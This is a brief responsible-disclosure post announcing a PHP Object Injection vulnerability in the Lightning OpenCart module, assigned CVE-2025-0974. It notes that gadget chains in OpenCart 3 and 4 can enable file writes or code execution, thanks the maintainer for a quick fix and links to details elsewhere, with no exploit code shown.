Research: PHP Object Injection in Lightning OpenCart module

As part of my research into Gadget Chains and PHP Object Injection, I discovered a vulnerability in the Lightning OpenCart module.

(POP/) Gadget Chains exist in OpenCart (3 and 4) which allow Object Injection vulnerabilities to be exploited, for example to write arbitrary files or achieve Remote Code Execution.

The maintainer was very responsive to the report and addressed the issue quickly. Thanks!

Details: https://gist.github.com/mcdruid/f8153d7d535c0fcba920e83a64953d4e

This was assigned CVE-2025-0974